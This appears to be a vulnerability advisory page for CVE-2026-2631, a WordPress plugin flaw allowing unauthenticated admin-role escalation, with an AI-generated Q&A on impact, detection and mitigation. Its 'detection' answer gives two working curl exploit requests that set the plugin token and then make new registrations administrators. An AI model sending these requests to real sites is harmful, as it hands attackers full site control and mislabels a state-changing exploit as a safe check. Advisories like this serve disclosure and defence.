CVE-2026-2631
Unauthenticated REST Endpoint Allows Admin Role Escalation in Datalogics Ecommerce Plugin
Publication date: 2026-03-11
Last updated on: 2026-03-11
Assigner: WPScan
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| datalogics | ecommerce_delivery_wordpress_plugin | to 2.6.60 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-269 | The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
[{'type': 'paragraph', 'content': 'CVE-2026-2631 affects the Datalogics Ecommerce Delivery WordPress plugin versions before 2.6.60. It involves an unauthenticated REST endpoint that allows any remote attacker to modify the `datalogics_token` option without verification.'}, {'type': 'paragraph', 'content': "This token is later used for authentication in a protected endpoint that permits arbitrary execution of WordPress's `update_option()` function. By exploiting this, an attacker can escalate privileges by enabling user registration and setting the default user role to administrator."}, {'type': 'paragraph', 'content': 'This means attackers can create new users who automatically have administrative privileges without any authentication.'}] [1]
How can this vulnerability impact me? :
The vulnerability allows attackers to gain administrative access to a WordPress site by enabling user registration and setting the default role to administrator.
This can lead to full site compromise, including the ability to modify site settings, install malicious plugins, steal sensitive data, or disrupt site operations.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'This vulnerability can be detected by checking if the unauthenticated REST endpoint to update the `datalogics_token` is accessible and can be used to modify plugin options without authentication.'}, {'type': 'paragraph', 'content': 'You can use curl commands to test the vulnerability by attempting to update the token and then check if the settings for user registration and default role can be changed.'}, {'type': 'list_item', 'content': 'Test updating the token with an unauthenticated POST request: \n```curl -X POST "http://example.com/index.php?rest_route=/datalogics-0/v1/update-token" -H "Content-Type: application/json" -d \'{"token":"NXPOC-2026"}\'```'}, {'type': 'list_item', 'content': 'Attempt to update settings using the token to enable user registration and set default role to administrator: \n```curl -X POST "http://example.com/index.php?rest_route=/datalogics-0/v1/update-settings" -H "Content-Type: application/json" -d \'{ "token":"NXPOC-2026", "settings":{ "users_can_register":"1", "default_role":"administrator" } }\'```'}, {'type': 'paragraph', 'content': 'After running these commands, verify in the WordPress admin panel under "Settings > General" if user registration is enabled and the default role is set to administrator, which indicates the vulnerability is present.'}] [1]
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to update the Datalogics Ecommerce Delivery WordPress plugin to version 2.6.60 or later, where this vulnerability has been fixed.
Until the update can be applied, consider restricting access to the vulnerable REST endpoints by implementing firewall rules or disabling the plugin if possible.
Additionally, review and reset the `datalogics_token` option and verify that user registration and default role settings have not been maliciously altered.